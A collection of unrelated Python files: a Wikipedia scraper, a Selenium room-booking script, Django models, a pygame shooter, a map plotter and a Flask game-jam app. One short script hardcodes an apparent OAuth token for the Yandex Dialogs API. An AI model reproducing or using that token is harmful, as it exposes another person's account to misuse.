logging.info('Summenformel gefunden:'+summenformel)
else:
if attempt != 1:
url_name='https://de.wikipedia.org/wiki/'+s_name.title()+'eigenschaften'
attempt=1
content=get_content(url_name)
download_file(content)
else:
logging.info('Keine Summenformel gefunden.')
def download_file(content):
    """Stream the HTTP response body to a temp file, then hand off to read_content."""
    temp_file=open('.\\tempfile.tmp', 'wb')
    logging.info('Download beginnt:')  # "download starting"
    # Write in 1 MB chunks to avoid holding the whole body in memory.
    for chunks in content.iter_content(10**6):
        temp_file.write(chunks)
    temp_file.close()
    logging.info('Download abgeschlossen:')  # "download finished"
    read_content()
def read_content():
temp_file=open('.\\tempfile.tmp', encoding='UTF-8')
try:
content=(temp_file.read())
except Exception as error_message:
logging.error('Fehler beim verarbeiten des Dateiinhalts')
print('Fehler aufgetreten: %s' % [error_message])
return
temp_file.close()
os.remove('.\\tempfile.tmp')
search_in_string(str(content))
def get_content(url_name):
    """Fetch *url_name* via HTTP GET and return the response object.

    Raises requests.HTTPError (via raise_for_status) for non-2xx responses.
    """
    logging.debug('Prüfe URL')  # "checking URL"
    content=requests.get(url_name)
    content.raise_for_status()
    return content
while True:
try:
attempt=''
print('Stoffname eingeben:')
s_name=input()
url_name='https://de.wikipedia.org/wiki/'+s_name.title()
content=get_content(url_name)
logging.debug('URL gefunden:'+url_name)
download_file(content)
except Exception as error_message:
logging.error('URL nicht gefunden.')
print('Fehler aufgetreten: %s' % [error_message])
continue
|
18,330 | 82e16d83cfa2098f4e7f18eaad7cff16544d7c2d | import time
import login
import setup
import prenotazione
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException
import os
# inserire matricola e password
os.system('cls')
setup.matricola = input("Matricola: ")
setup.password = input("Password: ")
# apre il sito
setup.driver.get("https://kairos.unifi.it/portalePlanning/BIBL/login.php")
# fa il login con matricola e password
# TODO: controllo sulle credenziali, se errate serve errore
login.login()
os.system('cls')
print("Scegliere il servizio da eseguire: ")
mode = int(input("\nNuova prenotazione -> 1 \nVisualizza prenotazioni -> 2: "))
print("Caricamento...")
if mode == 1: # nuova prenotazione
# aspetta che la pagina principale venga caricata
try:
pagina_principale = WebDriverWait(setup.driver, 5).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
# esegue prenotazione per la mattina
prenotazione.nuova_prenotazione("Mattina")
except NoSuchElementException:
print("Finito Mattina")
time.sleep(2)
try:
pagina_principale = WebDriverWait(setup.driver, 5).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
# esegue prenotazione per il pomeriggio
prenotazione.nuova_prenotazione("Pomeriggio")
except NoSuchElementException:
print("Finito pomeriggio")
# finite le prenotazioni, chiude tutto
print("Tutte le prenotazioni sono state eseguite!")
elif mode == 2: # visualizza prenotazioni
try:
pagina_principale = WebDriverWait(setup.driver, 10).until(
EC.presence_of_element_located((By.ID, "titolo-pagina"))
)
prenotazione.gestione_prenotazioni()
except NoSuchElementException:
print("Impossibile aprire pagina prenotazioni!")
else:
print("Comando errato!")
setup.driver.quit()
|
18,331 | 41e99bf2e7ce231c981822933f1de10755f577e3 | class constants:
CATEGORIES = [
"artliterature",
"language",
"sciencenature",
"general",
"fooddrinkn",
"peopleplaces",
"geography",
"historyholidays",
"entertainment",
"toysgames",
"music mathematics",
"religionmythology",
"sportsleisure",
] |
18,332 | 65027b362b7e977b428cd62218fc050ff2e39877 | from django.db import models
# Create your models here.
class Producto(models.Model):
    """A product to watch, identified by a name and a search URL."""
    # Short display name of the product.
    producto = models.CharField(max_length=25)
    # URL used to look the product up.
    url_de_busqueda = models.URLField()
    def __str__(self):
        return self.producto
class Correo(models.Model):
email = models.EmailField()
class Existencias(models.Model):
pass |
18,333 | ae8261e515dde3cca13fde5e5102c55d71dc353b | #!/usr/local/bin/python3
from time import time
import pygame
#
SECONDS_TO_MICRO_SECONDS = 1000000
#
TUPLE_COLOR_BLACK = (0, 0, 0)
TUPLE_COLOR_GREEN = (0, 226, 143)
TUPLE_COLOR_RED = (226, 70, 70)
#
IMAGE_BIG_MAC = "big_mac_small.png"
IMAGE_RICHARD_SIMMONS = "richard_simmons_small_2.png"
# Frames per second
TIME_TICK_LOOP = 120
#
MARGIN_SCREEN = 20
MARGIN_OPPONENTS = MARGIN_SCREEN + 105
HEIGHT_SCREEN = 720
WIDTH_SCREEN = 1080
LENGTH_BOX_SHIP = 50
# Player frame
HEIGHT_FRAME_PLAYER = max(
HEIGHT_SCREEN // 10, LENGTH_BOX_SHIP)
WIDTH_FRAME_PLAYER = WIDTH_SCREEN
WIDTH_FRAME_PLAYER_HALF = WIDTH_FRAME_PLAYER // 2
# Opponent frame
FACTOR_HEIGHT_FRAME_OPPONENTS = 1.0 / 2.0
HEIGHT_FRAME_OPPONENTS = (
HEIGHT_SCREEN - HEIGHT_FRAME_PLAYER)
WIDTH_FRAME_OPPONENTS = WIDTH_SCREEN
#
ACCELERATION_VALUE_MAX = 50
ACCELERATION_INCREMENT_HUMAN = 10
ACCELERATION_MULTIPLIER = 2.5
DECCELERATION_FACTOR = 0.85
INCREMENT_MOVE_X_OPPONENT = 10
INCREMENT_MOVE_Y_OPPONENT = 30
#
COUNT_COLUMN_AND_ROW_OPPONENT = 7
#
DIRECTION_NONE = -1
DIRECTION_LEFT = 0
DIRECTION_RIGHT = 1
DIRECTION_UP = 2
DIRECTION_DOWN = 3
#
WINNER_NONE = -1
WINNER_HUMAN = 0
WINNER_OPPONENT = 1
def sign(value):
    """Return -1, 0 or 1 matching the sign of ``value``."""
    if value > 0:
        return 1
    if value < 0:
        return -1
    return 0
class BasicSprite:
def __init__(self, screen, sprite, rect):
self.create_random_id()
self.screen = screen
self.sprite = sprite
self.rect = rect
self.update_dimensions()
self.update_mask()
self.set_exists(True)
# Assigns an id using current time in microseconds
def create_random_id(self):
self.id = int(time() * SECONDS_TO_MICRO_SECONDS)
# Ensures destroyed object won't be redrawn; however, object needs to be
# removed externally (i.e. where it is stored)
def destroy(self):
self.set_exists(False)
def update_rect(self):
self.rect = self.sprite.get_rect()
def update_dimensions(self):
self.dimensions = self.sprite.get_size()
def update_mask(self):
self.mask = pygame.mask.from_surface(self.sprite)
#print("\nmask {}\n".format(self.mask.__dir__()))
def get_mask(self):
return self.mask
def get_coordinates(self):
return (
self.rect.left,
self.rect.right,
self.rect.top,
self.rect.bottom)
# Distance between left side and left side of screen
def get_left_gap(self):
return self.rect.left
# Distance between right side and right side of screen
def get_right_gap(self):
return (WIDTH_SCREEN - self.rect.right)
def exists(self):
return self._exists
# Determine if two sprites overlap/collide
def check_overlaps(self, basic_sprite):
value = self.mask.overlap(
basic_sprite.get_mask(),
(basic_sprite.rect.left - self.rect.left,
basic_sprite.rect.top - self.rect.top))
return value
def set_exists(self, exists):
self._exists = exists
# Move to position unless outside of allowed coordinates; returns actual
# position delta in contrast with asked
def set_location(self, x, y):
center_change = [
self.rect.centerx,
self.rect.centery]
self.rect.centerx = x
self.rect.centery = y
# Ensure within allowed coordinates
if self.rect.left < MARGIN_SCREEN:
self.rect.centerx = MARGIN_SCREEN + self.dimensions[0] // 2
elif self.rect.right > (WIDTH_SCREEN - MARGIN_SCREEN):
self.rect.centerx = (
(WIDTH_SCREEN - MARGIN_SCREEN) - self.dimensions[0] // 2)
# Return true position delta
center_change[0] = self.rect.centerx - center_change[0]
center_change[1] = self.rect.centery - center_change[1]
return center_change
# Scale sprite to box container (max_dimension X max_dimension)
def scale_to_fit(self, max_dimension):
scale_factor = (
float(max_dimension) / float(max(*self.dimensions)))
width = int(float(self.dimensions[0]) * scale_factor)
height = int(float(self.dimensions[1]) * scale_factor)
self.sprite = pygame.transform.scale(self.sprite, (width, height))
self.update_rect()
self.update_dimensions()
self.update_mask()
# Translate by some delta ensuring to stay within allowed range
def translate(self, x, y):
return self.set_location(self.rect.centerx + x, self.rect.centery + y)
# Only redraw if 'exists'
def redraw(self):
if self.exists():
self.screen.blit(self.sprite, self.rect)
return self.exists()
class Background(BasicSprite):
    """Full-screen solid black backdrop, redrawn each frame to clear the screen."""
    def __init__(self, screen):
        # A plain surface the size of the display, anchored at the origin.
        super().__init__(
            screen,
            pygame.Surface(screen.get_size()),
            (0, 0))
        self.sprite.fill(TUPLE_COLOR_BLACK)
# Simple Text Label
class Text(BasicSprite):
def __init__(self, screen, text, color, font, size):
self.text = text
self.color = color
self.font = font
self.size = size
self.my_font = pygame.font.SysFont(font, size)
self.label = self.my_font.render(text, 1, color)
super().__init__(
screen,
self.label,
self.label.get_rect())
# Base spaceship
class SpaceShip(BasicSprite):
def __init__(self, screen, ship_image, default_square_color):
# Attempt to load image
try:
sprite = pygame.image.load(ship_image)
# Create rect instead
except Exception as e:
print("{}\nLoading default square".format(e))
sprite = pygame.Surface((LENGTH_BOX_SHIP, LENGTH_BOX_SHIP))
# Set color
sprite.fill(default_square_color)
super().__init__(screen, sprite, sprite.get_rect())
self.scale_to_fit(LENGTH_BOX_SHIP)
# default location
self.set_location(0, 0)
class HumanSpaceShip(SpaceShip):
def __init__(self, screen):
super().__init__(screen, IMAGE_RICHARD_SIMMONS, TUPLE_COLOR_GREEN)
# Floor division set to middle
self.set_location(WIDTH_SCREEN / 2, HEIGHT_SCREEN / 2)
# Set 0 acceleration
self.acceleration = [0, 0]
# Center within allowed human coordinates
def center(self):
x = WIDTH_FRAME_PLAYER / 2
y = (
HEIGHT_SCREEN -
(HEIGHT_FRAME_PLAYER / 2))
self.set_location(x, y)
# Accelerate in only -/+ x direction; inhibit acceleration while
# approaching sides
def accelerate(self, x, y):
# X
self.acceleration[0] += x
gap = WIDTH_FRAME_PLAYER_HALF
if sign(self.acceleration[0]) > 0:
gap = (
WIDTH_FRAME_PLAYER -
self.rect.centerx -
self.dimensions[0] // 2)
elif sign(self.acceleration[0]) < 0:
gap = (
self.rect.centerx -
self.dimensions[0] +
self.dimensions[0] // 2)
gap = int(float(gap) * 0.75)
limit_x = min(
int(ACCELERATION_VALUE_MAX *
gap * ACCELERATION_MULTIPLIER / WIDTH_FRAME_PLAYER),
ACCELERATION_VALUE_MAX)
self.acceleration[0] = (
sign(self.acceleration[0]) *
min(abs(self.acceleration[0]), limit_x))
# Y - Unfinished since restricted y-movement
self.acceleration[1] += y
self.acceleration[1] = (
sign(self.acceleration[1]) *
min(self.acceleration[1], ACCELERATION_VALUE_MAX))
# Decrement acceleration to inhibit continuous movement
def deccelerate(self):
if abs(self.acceleration[0]) > 0:
self.acceleration[0] = int(
float(self.acceleration[0]) * DECCELERATION_FACTOR)
if abs(self.acceleration[1]) > 0:
self.acceleration[1] = int(
float(self.acceleration[1]) * DECCELERATION_FACTOR)
def redraw(self):
self.translate(self.acceleration[0], self.acceleration[1])
super(SpaceShip, self).redraw()
self.deccelerate()
class OpponentSpaceShip(SpaceShip):
    """An enemy ship (Big Mac sprite, red fallback square), spawned at screen center."""
    def __init__(self, screen):
        super().__init__(screen, IMAGE_BIG_MAC, TUPLE_COLOR_RED)
        # Start at the middle of the screen; `/` is true division here, but
        # set_location accepts the resulting floats.
        self.set_location(WIDTH_SCREEN / 2, HEIGHT_SCREEN / 2)
# Handles all opponent space ships
class OpponentSquadron:
def __init__(self, screen, row_and_column_size):
self.direction = DIRECTION_RIGHT
self.direction_previous = self.direction
self.screen = screen
self.row_and_column_size = row_and_column_size
self.ships = {}
self.left = {}
self.right = {}
self.front_line = {}
self.setup_ships()
# Return front ships
def get_front_line_ships(self):
return self.front_line
# Evenly space out ships within initial allowed range
def setup_ships(self):
start_bottom_edge = int(
float(HEIGHT_FRAME_OPPONENTS) * FACTOR_HEIGHT_FRAME_OPPONENTS)
horizontal_separation = (
(WIDTH_SCREEN - (2 * MARGIN_OPPONENTS)) / self.row_and_column_size)
vertical_separation = start_bottom_edge / self.row_and_column_size
for r in range(0, self.row_and_column_size):
for c in range(0, self.row_and_column_size):
ship = OpponentSpaceShip(self.screen)
id = ship.id
x = int(
(0.5 + float(r)) * horizontal_separation +
MARGIN_OPPONENTS)
y = int((0.5 + float(c)) * vertical_separation)
ship.set_location(x, y)
if r == 0:
self.left[id] = ship
if r == (self.row_and_column_size - 1):
self.right[id] = ship
if c == (self.row_and_column_size - 1):
self.front_line[id] = ship
self.ships[id] = ship
# Check whether left or right ships reached allowed edge/coordinates
def check_reached_boundary(self):
ships = self.left
if self.direction == DIRECTION_RIGHT:
ships = self.right
ship = list(ships.values())[0]
#
gap = MARGIN_SCREEN * 2
if self.direction == DIRECTION_RIGHT:
gap = ship.get_right_gap()
else:
gap = ship.get_left_gap()
#
return (gap <= MARGIN_SCREEN)
# Update which direction ships are flying in
def update_direction(self):
tmp_direction = self.direction
# Currently moving left
if ((self.direction == DIRECTION_LEFT) or
(self.direction == DIRECTION_RIGHT)):
if self.check_reached_boundary():
self.direction = DIRECTION_DOWN
self.direction_previous = tmp_direction
# Switch to left or right?
elif self.direction == DIRECTION_DOWN:
if self.direction_previous == DIRECTION_LEFT:
self.direction = DIRECTION_RIGHT
else:
self.direction = DIRECTION_LEFT
self.direction_previous = tmp_direction
# Calculate translation delta and move
def move_ships(self):
translation = [0, 0]
#
self.update_direction()
#
if self.direction == DIRECTION_LEFT:
translation = [-1 * INCREMENT_MOVE_X_OPPONENT, 0]
elif self.direction == DIRECTION_RIGHT:
translation = [INCREMENT_MOVE_X_OPPONENT, 0]
elif self.direction == DIRECTION_DOWN:
translation = [0, INCREMENT_MOVE_Y_OPPONENT]
#
'''
ships_to_move = {
id: ship
for id, ship in ships_to_move.items() if ship not in ships_moved}
'''
#for id, ship in ships_to_move.items():
for id, ship in self.ships.items():
ship.translate(translation[0], translation[1])
def update(self):
self.move_ships()
for id, ship in self.ships.items():
ship.redraw()
# print("{} coords: {}".format(ship.id, ship.get_coordinates()))
class Game:
def __init__(self):
pygame.init()
self.init_winner()
self.init_screen()
self.init_human_ship()
self.init_opponent_squadron()
def init_winner(self):
self.winner = WINNER_NONE
self.winner_text = None
def init_screen(self):
self.screen = pygame.display.set_mode(
(WIDTH_SCREEN, HEIGHT_SCREEN))
self.background = Background(self.screen)
def init_human_ship(self):
self.human_ship = HumanSpaceShip(self.screen)
self.human_ship.center()
def init_opponent_squadron(self):
self.opponent_squadron = OpponentSquadron(
self.screen, COUNT_COLUMN_AND_ROW_OPPONENT)
def check_collisions(self):
if self.human_ship is not None:
collided = False
ships = self.opponent_squadron.get_front_line_ships().items()
for id, ship in ships:
if self.human_ship.check_overlaps(ship):
ship.destroy()
collided = True
#
if collided:
self.human_ship.destroy()
def clean_up(self):
if self.human_ship is not None:
if not self.human_ship.exists():
self.human_ship = None
def update_winner(self):
if self.winner == WINNER_NONE:
text = None
color = None
if self.human_ship is None:
self.winner = WINNER_OPPONENT
text = "Opponent"
color = TUPLE_COLOR_RED
elif self.opponent_squadron is None:
self.winner = WINNER_HUMAN
text = "Human"
color = TUPLE_COLOR_GREEN
else:
self.winner = WINNER_NONE
#
if self.winner != WINNER_NONE:
text = "{} Wins!".format(text)
self.winner_text = Text(
self.screen, text, color, "arial", 60)
self.winner_text.set_location(
WIDTH_SCREEN // 2, HEIGHT_SCREEN // 2)
def update(self):
self.background.redraw()
#
self.update_winner()
if self.winner == WINNER_NONE:
#
self.check_collisions()
self.clean_up()
if self.human_ship is not None:
self.human_ship.redraw()
self.opponent_squadron.update()
else:
self.winner_text.redraw()
# Update display
pygame.display.flip()
def handle_key_pressed(self):
if self.human_ship is not None:
# Get key input
key_input = pygame.key.get_pressed()
#
if key_input[pygame.K_LEFT]:
self.human_ship.accelerate(-1 * ACCELERATION_INCREMENT_HUMAN, 0)
elif key_input[pygame.K_RIGHT]:
self.human_ship.accelerate(ACCELERATION_INCREMENT_HUMAN, 0)
def handle_events(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
exit(0)
def loop(self):
self.update()
self.clock = pygame.time.Clock()
while True:
# Frames per second
self.clock.tick(TIME_TICK_LOOP)
pygame.event.pump()
self.handle_key_pressed()
self.handle_events()
self.update()
def main():
    """Entry point: build a Game and run its blocking main loop."""
    Game().loop()


if __name__ == '__main__':
    main()
|
from math import pi


def sector_area(angle_degrees, radius):
    """Return the area of a circular sector.

    A sector spanning ``angle_degrees`` of a circle of radius ``radius``
    has area (angle / 360) * pi * r**2.

    Bug fix: the original computed (angle / 360) * 2 * pi * r**2, i.e.
    twice the sector area (the 2*pi*r factor belongs to arc length).
    """
    return (angle_degrees / 360) * pi * radius * radius


def main():
    # float(...) instead of eval(...): eval executes arbitrary code typed
    # by the user, which is unsafe and unnecessary for numeric input.
    a = float(input('enter the value of the angle:'))
    b = float(input('enter the length of the radius:'))
    print('the area of your input sector is', sector_area(a, b))


if __name__ == '__main__':
    main()
|
18,335 | be9f7bc00e3ff9243614d688ca85667e3c471024 | import os
import time
import math
from PIL import Image, ImageDraw
import utilities
## Config
CONFIG_OPTIONS = utilities.load_config()
## Todo: genericize and move into bot_io.py?
class PlotterFileController:
## Keys
RESOURCES_FOLDER_KEY = "resources_folder"
RESOURCES_FOLDER_PATH_KEY = "resources_folder_path"
MAP_FILES_KEY = "map_files"
MAP_FILE_PATHS_KEY = "map_file_paths"
MAP_FILE_EXTENSION_KEY = "map_file_extension"
OUTPUT_FOLDER_KEY = "output_folder"
OUTPUT_FOLDER_PATH_KEY = "output_folder_path"
## Defaults
RESOURCES_FOLDER = CONFIG_OPTIONS.get(RESOURCES_FOLDER_KEY, "resources")
RESOURCES_FOLDER_PATH = CONFIG_OPTIONS.get(RESOURCES_FOLDER_PATH_KEY, os.sep.join([utilities.get_root_path(), RESOURCES_FOLDER]))
MAP_FILES = CONFIG_OPTIONS.get(MAP_FILES_KEY, {})
MAP_FILE_PATHS = CONFIG_OPTIONS.get(MAP_FILE_PATHS_KEY, {})
MAP_FILE_EXTENSION = CONFIG_OPTIONS.get(MAP_FILE_EXTENSION_KEY, "jpeg")
OUTPUT_FOLDER = CONFIG_OPTIONS.get(OUTPUT_FOLDER_KEY, "temp")
OUTPUT_FOLDER_PATH = CONFIG_OPTIONS.get(OUTPUT_FOLDER_PATH_KEY, os.sep.join([utilities.get_root_path(), OUTPUT_FOLDER]))
def __init__(self, **kwargs):
self.map_file_paths = kwargs.get(self.MAP_FILE_PATHS_KEY)
if(not self.MAP_FILE_PATHS):
self.map_file_paths = {}
for map_name, map_path in self.MAP_FILES.items():
self.map_file_paths[map_name] = os.sep.join([self.RESOURCES_FOLDER_PATH, map_path])
self.map_file_extension = kwargs.get(self.MAP_FILE_EXTENSION_KEY, self.MAP_FILE_EXTENSION)
self.output_folder_path = kwargs.get(self.OUTPUT_FOLDER_PATH_KEY, self.OUTPUT_FOLDER_PATH)
self.maps = {}
## Prep the temp dir for image saving/deletion
if(self.output_folder_path):
self._init_dir()
def _init_dir(self):
if(not os.path.exists(self.output_folder_path)):
os.makedirs(self.output_folder_path)
else:
for root, dirs, files in os.walk(self.output_folder_path, topdown=False):
for file in files:
try:
os.remove(os.sep.join([root, file]))
except OSError as e:
utilities.debug_print("Error removing file: {}, during temp dir cleanup.".format(file), e, debug_level=2)
def _generate_unique_file_name(self, extension):
time_ms = int(time.time() * 1000)
file_name = "{}.{}".format(time_ms, extension)
while(os.path.isfile(file_name)):
time_ms -= 1
file_name = "{}.{}".format(time_ms, extension)
return file_name
def load_base_maps(self):
maps = {}
try:
for map_name, map_path in self.map_file_paths.items():
maps[map_name] = Image.open(map_path)
except Exception as e:
utilities.debug_print("Error opening base_map.", e, debug_level=0)
return maps
def save_map(self, pillow_image, file_name=None):
file_name = self._generate_unique_file_name(self.map_file_extension) if not file_name else file_name
file_path = os.sep.join([self.output_folder_path, file_name])
try:
pillow_image.save(file_path, format=self.map_file_extension)
except IOError as e:
utilities.debug_print("Unable to save image at: '{}'.".format(file_path), e, debug_level=0)
return None
else:
return file_path
def create_delete_map_callback(self, path):
def _delete_map_callback():
try:
os.remove(path)
except OSError as e:
utilities.debug_print("Error deleting map at: '{}'.".format(path), e, debug_level=1)
return False
return True
return _delete_map_callback
class Plotter:
    """Draws flight-path and parachute-drop-range overlays onto the
    configured base-map images using PIL."""
    ## Keys
    PARACHUTE_CONFIG_KEY = "parachute_config"
    PLANE_PATH_WIDTH_KM_KEY = "plane_path_width_km"
    PLANE_PATH_COLOR_KEY = "plane_path_color"
    SHORT_PARACHUTE_PATH_WIDTH_KM_KEY = "short_parachute_path_width_km"
    SHORT_PARACHUTE_PATH_COLOR_KEY = "short_parachute_path_color"
    LONG_PARACHUTE_PATH_WIDTH_KM_KEY = "long_parachute_path_width_km"
    LONG_PARACHUTE_PATH_COLOR_KEY = "long_parachute_path_color"
    TRIANGLE_SIZE_KM_KEY = "triangle_size_km"
    TRIANGLE_COLOR_KEY = "triangle_color"
    def __init__(self, **file_controller_kwargs):
        # File controller handles loading base maps and temp-file output.
        self.file_controller = PlotterFileController(**file_controller_kwargs)
        self.base_maps = self.file_controller.load_base_maps()
        self.plane_path_width_km = CONFIG_OPTIONS.get(self.PLANE_PATH_WIDTH_KM_KEY, 0.1)
        self.plane_path_color = CONFIG_OPTIONS.get(self.PLANE_PATH_COLOR_KEY, "white")
        self.triangle_size_km = CONFIG_OPTIONS.get(self.TRIANGLE_SIZE_KM_KEY, 0.2)
        self.triangle_color = CONFIG_OPTIONS.get(self.TRIANGLE_COLOR_KEY, "white")
        # Per-map parachute widths/colors; plotting requires this config.
        self.parachute_config = CONFIG_OPTIONS.get(self.PARACHUTE_CONFIG_KEY, None)
        assert(self.parachute_config != None)
    def _rotate_coordinate(self, x, y, angle):
        """
        Rotate a given coordinate around the origin by the specified angle.
        """
        sin = math.sin(angle)
        cos = math.cos(angle)
        x_ = x * cos - y * sin
        y_ = x * sin + y * cos
        return (x_, y_)
    def _scale_coordinate(self, x, y, scale_factor):
        """
        Scale a given point by the given scale factor from the origin.
        """
        return (x * scale_factor, y * scale_factor)
    def _translate_coordinate(self, x1, y1, x2, y2):
        """
        Translate a given point relative another point.
        """
        return (x1 + x2, y1 + y2)
    def _plot_line(self, image, x1, y1, x2, y2, width, color):
        """
        Plot a line from (x1,y1) to (x2,y2) with a thickness of 'width' and colored in with 'color'.
        """
        draw = ImageDraw.Draw(image, "RGBA")
        draw.line([x1, y1, x2, y2], fill=color, width=width)
        del draw
        return image
    def _plot_triangle(self, image, x, y, rotation, side_length, color):
        """
        Plot a triangle centered on (x,y), rotated 'rotation' degrees clockwise from the east, and has side lengths of
        'side_length' and colored in with 'color'.
        """
        ## Precalculate the 'unit' triangle's centered coords, facing east
        coords = [(-0.283, -0.5), (-0.283, 0.5), (0.567, 0)]
        ## Calculate the triangle's side length scaling factor
        scale_factor = side_length / 1
        ## Scale, rotate, and translate the coords about the origin
        for index, coord in enumerate(coords):
            _x, _y = self._rotate_coordinate(*coord, -rotation)
            _x, _y = self._scale_coordinate(_x, _y, scale_factor)
            coords[index] = self._translate_coordinate(_x, _y, x, y)
        draw = ImageDraw.Draw(image, "RGBA")
        draw.polygon(coords, fill=color, outline=color)
        del draw
        return image
    def plot_plane_path(self, map_name, path_obj):
        """Return a copy of map *map_name* with the plane's path, the
        short/long parachute drop bands, and a heading triangle drawn on.

        *path_obj* supplies grid coordinates and a heading angle.
        """
        ## Get a copy of the map, so it's never overridden
        base_map = self.base_maps[map_name].copy()
        # Assumes every base map image spans 8 km horizontally -- TODO confirm.
        pixels_per_km = base_map.size[0] // 8
        ## Get the height and width of the map image, and calculate the diagonal's length
        map_width, map_height = base_map.size
        map_diagonal_length = int(math.sqrt(pow(map_width, 2) + pow(map_height, 2)))
        ## Get the x, y, and angle supplied by the user
        x = path_obj.grid_obj.get_true_x(pixels_per_km)
        y = path_obj.grid_obj.get_true_y(pixels_per_km)
        angle = math.radians(path_obj.heading_obj.angle)
        ## Generate the x and y coord pairs for the plane's path line
        x1 = x - map_diagonal_length * math.cos(angle)
        y1 = y + map_diagonal_length * math.sin(angle) ## Invert both the y components; upside down coordinate system
        x2 = x + map_diagonal_length * math.cos(angle)
        y2 = y - map_diagonal_length * math.sin(angle)
        ## Get the correct parachute config from the dict
        parachute_config = self.parachute_config[map_name]
        ## Prep widths
        plane_path_width = int(self.plane_path_width_km * pixels_per_km)
        triangle_size = int(self.triangle_size_km * pixels_per_km)
        ## *2 because the width is only half of what it should be, since players can drop in any direction
        short_parachute_path_width = int(parachute_config[self.SHORT_PARACHUTE_PATH_WIDTH_KM_KEY] * pixels_per_km * 2)
        long_parachute_path_width = int(parachute_config[self.LONG_PARACHUTE_PATH_WIDTH_KM_KEY] * pixels_per_km * 2)
        ## Plot the requisite lines
        ## Todo: plot in place
        plotted_map = self._plot_line(base_map, x1, y1, x2, y2, long_parachute_path_width, parachute_config[self.LONG_PARACHUTE_PATH_COLOR_KEY])
        plotted_map = self._plot_line(base_map, x1, y1, x2, y2, short_parachute_path_width, parachute_config[self.SHORT_PARACHUTE_PATH_COLOR_KEY])
        plotted_map = self._plot_line(base_map, x1, y1, x2, y2, plane_path_width, self.plane_path_color)
        plotted_map = self._plot_triangle(base_map, x, y, angle, triangle_size, self.triangle_color)
        ## return the final map
        return plotted_map
|
18,336 | 7b53ceb25c9606816b65a6830c2deac95af5816c | import requests
import json
import os
token = 'AQAAAAA1ZV4rAAT7ozFhxJ47VUYgkXM9IImE1zk'
url = 'https://dialogs.yandex.net/api/v1/status'
headers = {'Host': 'https://dialogs.yandex.net/api/v1/status', f'Authorization': f'OAuth {token}'}
response = requests.get(url, headers=headers)
print(response.text) |
18,337 | 36f137ba3b581ffb024cc25198248c1a1894e0a9 | from flask import Flask, render_template, current_app, abort, request, redirect, url_for, send_from_directory
from flask_login import login_required, logout_user, login_user, current_user
from login import load_user
import bcrypt
from datetime import datetime
from database import Database
from specs import getRoles, getSpecializations, specsContains, decodeRoles
def home_page():
    """Render the landing page."""
    template = "home.html"
    return render_template(template)
def image_server(filename):
    """Serve a stored image from the local ./images directory."""
    images_dir = "./images"
    return send_from_directory(images_dir, filename)
@login_required
def chat_page(chat_id):
    """Render chat room *chat_id* with its message history.

    Aborts with 403 when the logged-in user is not a member of the room.
    """
    user_data = current_user.data
    if not Database.getInstance().IsUserInChatroom(user_data.id, chat_id):
        abort(403)
    past_messages = Database.getInstance().GetMessages(chat_id)
    return render_template("messaging.html", room_id = chat_id, past_messages=past_messages, current_user_id=user_data.id)
@login_required
def mychats_page():
    """List the current user's team chat rooms and private chat rooms."""
    user_data = current_user.data
    team_chats = Database.getInstance().GetTeamChatRooms(user_data.id)
    private_chats = Database.getInstance().GetPrivateChatRooms(user_data.id)
    return render_template("mychats.html", team_chats = team_chats, private_chats=private_chats)
def start_chat():
    """Create a private chat room between the current user and the user id
    posted in the 'user' form field, then redirect into that room.

    404s when no target user was supplied or the target is the requester.
    """
    print(request.form)
    other_user = request.form.get('user', None)
    # TODO: Make sure private chat does not already exist
    if other_user is None or other_user == current_user.get_id():
        abort(404)
    db = Database.getInstance()
    chat_id = db.CreateChatroom()
    db.JoinChatroom(current_user.get_id(), chat_id)
    db.JoinChatroom(other_user, chat_id)
    return redirect(url_for("chat_page", chat_id=chat_id))
def gamejams_page(status):
    """List game jams filtered by *status*.

    GET renders jams for one of the recognized statuses (404 otherwise);
    POST redirects back to GET with the status chosen in the form.
    """
    if request.method == "GET":
        database = Database.getInstance()
        # Dispatch table instead of the if/elif chain.
        fetchers = {
            "Active": database.GetActiveGameJams,
            "Ongoing": database.GetOngoingGameJams,
            "Past": database.GetPastGameJams,
            "Upcoming": database.GetUpcomingGameJams,
            "All": database.GetAllGameJams,
        }
        if status not in fetchers:
            abort(404)
        gamejams = fetchers[status]()
        return render_template("gamejams.html", now = datetime.now(), gamejams = sorted(gamejams, key=lambda x: x.startDate, reverse=False))
    else:
        # Bug fix: the POST default used to be "ALL", which the GET branch
        # does not recognize and would abort(404); the valid value is "All".
        return redirect(url_for("gamejams_page", status = request.form.get("status", "All")))
def gamejams_redirect():
    """Send bare jam-list requests to the 'Active' listing."""
    default_status = 'Active'
    return redirect(url_for("gamejams_page", status = default_status))
@login_required
def jam_page(jam_id):
    """GET: show a jam's info page (404 if unknown).  POST: handle the
    'delete' and 'join' form actions, then redirect appropriately."""
    if request.method == "GET":
        jam = Database.getInstance().GetGameJam(jam_id)
        if not jam:
            abort(404)
        else:
            attending = Database.getInstance().GetUsersAttending(jam_id)
            current_user_id = current_user.data.id
            # Whether the viewer already appears in the attendee list.
            user_attending = next((x for x in attending if x.id == current_user_id), None)
            return render_template(
                "jam_info.html",
                jam = jam,
                now = datetime.now(),
                attending = attending,
                current_user_attending = user_attending
            )
    elif request.method == "POST":
        if request.form.get('delete', None) is not None:
            Database.getInstance().DeleteGameJam(jam_id)
            return redirect(url_for("myjams_page"))
        elif request.form.get('join', None) is not None:
            Database.getInstance().UserAttendJam(current_user.data.id, jam_id)
            #TODO: Redirect to teams page
            return redirect(url_for("jam_page", jam_id = jam_id))
        return redirect(url_for("jam_page", jam_id = jam_id))
def render_jam_page(values, current_datetime, edit_mode = False):
    """Render the jam create/edit form with pre-filled *values*."""
    return render_template(
        "newjam.html",
        values = values,
        min = current_datetime,
        edit_mode = edit_mode,
    )
@login_required
def newjam_page():
    """GET: blank jam-creation form.  POST: validate and create the jam,
    auto-attending the creator, then redirect to the jam page."""
    if request.method == "GET":
        current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
        values = { "data": {"startDate": current_datetime, "endDate": current_datetime}}
        return render_jam_page(values, current_datetime)
    else:
        valid = validate_newjam_form(request.form)
        if not valid:
            # Re-render the form with the user's input and error messages.
            current_datetime = '{date:%Y-%m-%dT%H:%M}'.format(date=datetime.now())
            return render_jam_page(request.form, current_datetime)
        data = request.form.data
